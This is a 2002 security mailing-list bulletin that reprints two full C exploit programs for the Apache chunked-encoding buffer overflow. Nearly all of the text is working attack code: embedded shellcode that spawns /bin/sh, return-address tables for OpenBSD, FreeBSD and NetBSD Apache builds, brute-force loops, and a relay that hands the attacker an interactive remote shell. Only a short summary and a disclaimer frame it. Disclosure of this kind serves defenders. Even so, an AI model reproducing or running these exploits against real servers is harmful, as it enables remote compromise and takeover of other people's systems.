[EXPL] Multiple Exploit Codes for Apache Chunked Buffer Vulnerability

From: support@securiteam.com
Date: 06/23/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 23 Jun 2002 20:51:43 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Multiple Exploit Codes for Apache Chunked Buffer Vulnerability
------------------------------------------------------------------------

SUMMARY

A security vulnerability in Apache has been found that would allow a
remote attacker to cause an internal buffer to overflow causing it to
overwrite essential memory causing the execution of arbitrary code. For
more information see our previous article:
 <http://www.securiteam.com/unixfocus/5HP0G207FY.html> Remote Compromise
Vulnerability in Apache HTTP Server (Chunked Encoding).

DETAILS

Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it
failed */
#define RET_ADDR_INC 512

#define MEMCPY_s1_OWADDR_DELTA -146
#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7

#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024

#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =
"\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f"
"\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02"
"\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04"
"\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8"
"\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03"
"\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89"
"\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80"
"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50"
"\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc";

struct {
 char *type;
 u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
 { "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f },
 { "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa },
 { "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 },
 { "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 },
 { "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 },
 { "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a },
 { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae },
};

int main(int argc, char *argv[]) {
 
 char *hostp, *portp;
 unsigned char buf[512], *expbuf, *p;
 int i, j, lport;
 int sock;
 int bruteforce, owned, progress;
 u_long retaddr;
 struct sockaddr_in sin, from;
 
 
 if(argc != 3) {
  printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
  printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
  printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
  printf("\n--- --- - Potential targets list - --- ----\n");
  printf("Target ID / Target specification\n");
  for(i = 0; i < sizeof(targets)/8; i++)
   printf("\t%d / %s\n", i, targets[i].type);
  
  return -1;
 }
 
 
 hostp = strtok(argv[2], ":");
 if((portp = strtok(NULL, ":")) == NULL)
  portp = "80";
 
 retaddr = strtoul(argv[1], NULL, 16);
 if(retaddr < sizeof(targets)/8) {
  retaddr = targets[retaddr].retaddr;
  bruteforce = 0;
 }
 else
  bruteforce = 1;
                
 
 srand(getpid());
 signal(SIGPIPE, SIG_IGN);
 for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
  
  /* skip invalid return adresses */
  i = retaddr & 0xff;
  if(i == 0x0a || i == 0x0d)
   retaddr++;
  else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
   continue;
  
  
  sock = socket(AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr(hostp);
  sin.sin_port = htons(atoi(portp));
  if(!progress)
   printf("\n[*] Connecting.. ");
  
  fflush(stdout);
  if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
   perror("connect()");
   exit(1);
  }
  
  if(!progress)
   printf("connected!\n");
  
  
  /* Setup the local port in our shellcode */
  i = sizeof(from);
  if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
   perror("getsockname()");
   exit(1);
  }
  
  lport = ntohs(from.sin_port);
  shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
  shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;
  
  
  p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
REP_SHELLCODE)
   + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *
REP_POPULATOR));
  
  PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");
  
  for (i = 0; i < REP_SHELLCODE; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_3, PADDING_3);
   PUT_STRING(": ");
   PUT_BYTES(NOPCOUNT, NOP);
   memcpy(p, shellcode, sizeof(shellcode) - 1);
   p += sizeof(shellcode) - 1;
   PUT_STRING("\r\n");
  }
  
  for (i = 0; i < REP_POPULATOR; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_1, PADDING_1);
   PUT_STRING(": ");
   for (j = 0; j < REP_RET_ADDR; j++) {
    *p++ = retaddr & 0xff;
    *p++ = (retaddr >> 8) & 0xff;
    *p++ = (retaddr >> 16) & 0xff;
    *p++ = (retaddr >> 24) & 0xff;
   }
   
   PUT_BYTES(REP_ZERO, 0);
   PUT_STRING("\r\n");
  }
  
  PUT_STRING("Transfer-Encoding: chunked\r\n");
  snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
  PUT_STRING(buf);
  PUT_BYTES(PADSIZE_2, PADDING_2);
  snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA);
  PUT_STRING(buf);
  
  write(sock, expbuf, p - expbuf);
  
  progress++;
  if((progress%70) == 0)
   progress = 1;
  
  if(progress == 1) {
   memset(buf, 0, sizeof(buf));
   sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport
%u",
    retaddr, (unsigned int)(p - expbuf), lport);
   memset(buf + strlen(buf), ' ', 74 - strlen(buf));
   puts(buf);
   if(bruteforce)
    putchar(';');
  }
  else
   putchar((rand()%2)? 'P': 'p');
  
  
  fflush(stdout);
  while (1) {
   fd_set fds;
   int n;
   struct timeval tv;
   
   tv.tv_sec = EXPLOIT_TIMEOUT;
   tv.tv_usec = 0;
   
   FD_ZERO(&fds);
   FD_SET(0, &fds);
   FD_SET(sock, &fds);
   
   memset(buf, 0, sizeof(buf));
   if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
    if(FD_ISSET(sock, &fds)) {
     if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
      break;
     
     if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
      printf("\nGOBBLE GOBBLE!@#%%)*#\n");
      printf("retaddr 0x%lx did the trick!\n", retaddr);
      sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local
kernel exploit to gain instant r00t\n");
      write(sock, expbuf, strlen(expbuf));
      owned++;
     }
     
     write(1, buf, n);
    }
    
    if(FD_ISSET(0, &fds)) {
     if((n = read(0, buf, sizeof(buf) - 1)) < 0)
      exit(1);
     
     write(sock, buf, n);
    }
   }
   
   if(!owned)
    break;
  }
  
  free(expbuf);
  close(sock);
  
  if(owned)
   return 0;
  
  if(!bruteforce) {
   fprintf(stderr, "Ooops.. hehehe!\n");
   return -1;
  }
 }
 
 return 0;
}

Exploit #2:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>
#ifdef __linux__
#include <getopt.h>
#endif

#define HOST_PARAM "apache-nosejob.c" /* The Host: field */
#define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another
bug/backdoor/feature (hi Theo!) to gain instant r00t';\n"
#define RET_ADDR_INC 512

#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7

#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024

#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b) memset(p, b, n); p += n;

char shellcode[] =
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
"\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
"\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
"\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
"\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
"\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
"\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
"\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
;

struct {
 char *type; /* description for newbie penetrator */
 int delta; /* delta thingie! */
 u_long retaddr; /* return address */
 int repretaddr; /* we repeat retaddr thiz many times in the buffer */
 int repzero; /* and \0'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
 { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80f3a00, 6, 36 },
 { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80a7975, 6, 36 },
 { "OpenBSD 3.0 x86 / Apache 1.3.20", -146, 0xcfa00, 6, 36 },
 { "OpenBSD 3.0 x86 / Apache 1.3.22", -146, 0x8f0aa, 6, 36 },
 { "OpenBSD 3.0 x86 / Apache 1.3.24", -146, 0x90600, 6, 36 },
 { "OpenBSD 3.0 x86 / Apache 1.3.24 #2", -146, 0x98a00, 6, 36 },
 { "OpenBSD 3.1 x86 / Apache 1.3.20", -146, 0x8f2a6, 6, 36 },
 { "OpenBSD 3.1 x86 / Apache 1.3.23", -146, 0x90600, 6, 36 },
 { "OpenBSD 3.1 x86 / Apache 1.3.24", -146, 0x9011a, 6, 36 },
 { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", -146, 0x932ae, 6, 36 },
 { "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146, 0x1d7a00, 6, 36 },
 { "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)", -90, 0x80eda00, 5, 42 },
 { "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", -90, 0x80efa00, 5, 42 },
 { "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", -90, 0x80efa00, 5, 42 },
 { "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)", -90, 0x80efa00, 5, 42 },
 { "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)", -90, 0x80efa00, 5, 42 },
}, victim;

void usage(void) {
 int i;
 
 printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n");
 printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n");
 printf(" -h host[:port]\tHost to penetrate\n");
 printf(" -t #\t\t\tTarget id.\n");
 printf(" Bruteforcing options (all required, unless -o is used!):\n");
 printf(" -o char\t\tDefault values for the following OSes\n");
 printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n");
 printf(" -b 0x12345678\t\tBase address used for bruteforce\n");
 printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n");
 printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n");
 printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n");
 printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n");
 printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n");
 printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n");
 printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n");
 printf(" Optional stuff:\n");
 printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode
reply\n");
 printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n");
 printf(" \t\t\taka auto0wncmdz\n");
 printf("\nExamples will be published in upcoming
apache-scalp-HOWTO.pdf\n");
 printf("\n--- --- - Potential targets list - --- ---- -------
------------\n");
 printf(" ID / Return addr / Target specification\n");
 for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
  printf("% 3d / 0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type);
 
 exit(1);
}

int main(int argc, char *argv[]) {
 char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
 u_char buf[512], *expbuf, *p;
 int i, j, lport, sock;
 int bruteforce, owned, progress, sc_timeout = 5;
 int responses, shown_length = 0;
 struct in_addr ia;
 struct sockaddr_in sin, from;
 struct hostent *he;
 
 
 if(argc < 4)
  usage();
 
 bruteforce = 0;
 memset(&victim, 0, sizeof(victim));
 while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) {
  switch(i) {
   /* required stuff */
  case 'h':
   hostp = strtok(optarg, ":");
   if((portp = strtok(NULL, ":")) == NULL)
    portp = "80";
   break;
   
   /* predefined targets */
  case 't':
   if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
    printf("Invalid target\n");
    return -1;
   }
   
   memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));
   break;
   
   /* bruteforce! */
  case 'b':
   bruteforce++;
   victim.type = "Custom target";
   victim.retaddr = strtoul(optarg, NULL, 16);
   printf("Using 0x%lx as the baseadress while bruteforcing..\n",
victim.retaddr);
   break;
   
  case 'd':
   victim.delta = atoi(optarg);
   printf("Using %d as delta\n", victim.delta);
   break;
   
  case 'r':
   victim.repretaddr = atoi(optarg);
   printf("Repeating the return address %d times\n", victim.repretaddr);
   break;
   
  case 'z':
   victim.repzero = atoi(optarg);
   printf("Number of zeroes will be %d\n", victim.repzero);
   break;
   
  case 'o':
   bruteforce++;
   switch(*optarg) {
   case 'f':
    victim.type = "FreeBSD";
    victim.retaddr = 0x80a0000;
    victim.delta = -150;
    victim.repretaddr = 6;
    victim.repzero = 36;
    break;
    
   case 'o':
    victim.type = "OpenBSD";
    victim.retaddr = 0x80000;
    victim.delta = -146;
    victim.repretaddr = 6;
    victim.repzero = 36;
    break;
    
   case 'n':
    victim.type = "NetBSD";
    victim.retaddr = 0x080e0000;
    victim.delta = -90;
    victim.repretaddr = 5;
    victim.repzero = 42;
    break;
    
   default:
    printf("[-] Better luck next time!\n");
    break;
   }
   break;
   
   /* optional stuff */
   case 'w':
    sc_timeout = atoi(optarg);
    printf("Waiting maximum %d seconds for replies from shellcode\n",
sc_timeout);
    break;
    
   case 'c':
    cmdz = optarg;
    break;
    
   default:
    usage();
    break;
  }
 }
 
 if(!victim.delta || !victim.retaddr || !victim.repretaddr ||
!victim.repzero) {
  printf("[-] Incomplete target. At least 1 argument is missing (nmap
style!!)\n");
  return -1;
 }
 
 printf("[*] Resolving target host.. ");
 fflush(stdout);
 he = gethostbyname(hostp);
 if(he)
  memcpy(&ia.s_addr, he->h_addr, 4);
 else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
  printf("There'z no %s on this side of the Net!\n", hostp);
  return -1;
 }
 
 printf("%s\n", inet_ntoa(ia));
 
 
 srand(getpid());
 signal(SIGPIPE, SIG_IGN);
 for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
  /* skip invalid return adresses */
  if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
   continue;
  
  
  sock = socket(PF_INET, SOCK_STREAM, 0);
  sin.sin_family = PF_INET;
  sin.sin_addr.s_addr = ia.s_addr;
  sin.sin_port = htons(atoi(portp));
  if(!progress)
   printf("[*] Connecting.. ");
  
  fflush(stdout);
  if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
   perror("connect()");
   exit(1);
  }
  
  if(!progress)
   printf("connected!\n");
  
  
  p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
REP_SHELLCODE)
   + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
   + 1024) * REP_POPULATOR));
  
  PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
  
  for (i = 0; i < REP_SHELLCODE; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_3, PADDING_3);
   PUT_STRING(": ");
   PUT_BYTES(NOPCOUNT, NOP);
   memcpy(p, shellcode, sizeof(shellcode) - 1);
   p += sizeof(shellcode) - 1;
   PUT_STRING("\r\n");
  }
  
  for (i = 0; i < REP_POPULATOR; i++) {
   PUT_STRING("X-");
   PUT_BYTES(PADSIZE_1, PADDING_1);
   PUT_STRING(": ");
   for (j = 0; j < victim.repretaddr; j++) {
    *p++ = victim.retaddr & 0xff;
    *p++ = (victim.retaddr >> 8) & 0xff;
    *p++ = (victim.retaddr >> 16) & 0xff;
    *p++ = (victim.retaddr >> 24) & 0xff;
   }
   
   PUT_BYTES(victim.repzero, 0);
   PUT_STRING("\r\n");
  }
  
  PUT_STRING("Transfer-Encoding: chunked\r\n");
  snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
  PUT_STRING(buf);
  PUT_BYTES(PADSIZE_2, PADDING_2);
  snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
  PUT_STRING(buf);
  
  if(!shown_length) {
   printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf));
   shown_length = 1;
  }
  
  write(sock, expbuf, p - expbuf);
  
  progress++;
  if((progress%70) == 0)
   progress = 1;
  
  if(progress == 1) {
   printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr);
   for(i = 0; i < 40; i ++)
    printf(" ");
   printf("\n");
   if(bruteforce)
    putchar(';');
  }
  else
   putchar(((rand()>>8)%2)? 'P': 'p');
  
  
  fflush(stdout);
  responses = 0;
  while (1) {
   fd_set fds;
   int n;
   struct timeval tv;
   
   tv.tv_sec = sc_timeout;
   tv.tv_usec = 0;
   
   FD_ZERO(&fds);
   FD_SET(0, &fds);
   FD_SET(sock, &fds);
   
   memset(buf, 0, sizeof(buf));
   if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
    if(FD_ISSET(sock, &fds)) {
     if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
      break;
     
     if(n >= 1)
     {
      if(!owned)
      {
       for(i = 0; i < n; i ++)
        if(buf[i] == 'G')
         responses ++;
        else
         responses = 0;
        if(responses >= 2)
        {
         owned = 1;
         write(sock, "O", 1);
         write(sock, cmdz, strlen(cmdz));
         printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr,
victim.repretaddr, victim.repzero);
         printf("Experts say this isn't exploitable, so nothing will
happen now: ");
         fflush(stdout);
        }
      } else
       write(1, buf, n);
     }
    }
    
    if(FD_ISSET(0, &fds)) {
     if((n = read(0, buf, sizeof(buf) - 1)) < 0)
      exit(1);
     
     write(sock, buf, n);
    }
    
   }
   
   if(!owned)
    break;
  }
  
  free(expbuf);
  close(sock);
  
  if(owned)
   return 0;
  
  if(!bruteforce) {
   fprintf(stderr, "Ooops.. hehehe!\n");
   return -1;
  }
 }
 
 return 0;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:gobbles@hushmail.com>
gobbles.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages